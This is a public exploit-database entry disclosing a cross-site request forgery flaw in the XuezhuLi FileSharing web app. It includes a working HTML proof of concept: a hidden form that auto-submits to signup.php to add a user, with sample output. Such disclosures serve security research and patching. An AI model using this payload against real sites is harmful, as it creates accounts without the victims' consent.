XuezhuLi FileSharing - (Add User) CSRF

2016.06.24
Credit: HaHwul
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!-- # Exploit Title: XuezhuLi FileSharing - CSRF(Add User) # Date: 2016-06-23 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/XuezhuLi # Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip # Version: Latest commit # Tested on: Debian [wheezy] --> <form name="csrf_poc" action="http://127.0.0.1/vul_test/FileSharing/signup.php" method="POST"> <input type="hidden" name="sign" value="ok"> <input type="hidden" name="newuser" value="csrf_test"> <input type="submit" value="Replay!"> </form> <script type="text/javascript">document.forms.csrf_poc.submit();</script> <!-- Output. #> cat /srv/userlists.txt aaaa csrf_test -->

References:

https://github.com/XuezhuLi/FileSharing/archive/master.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top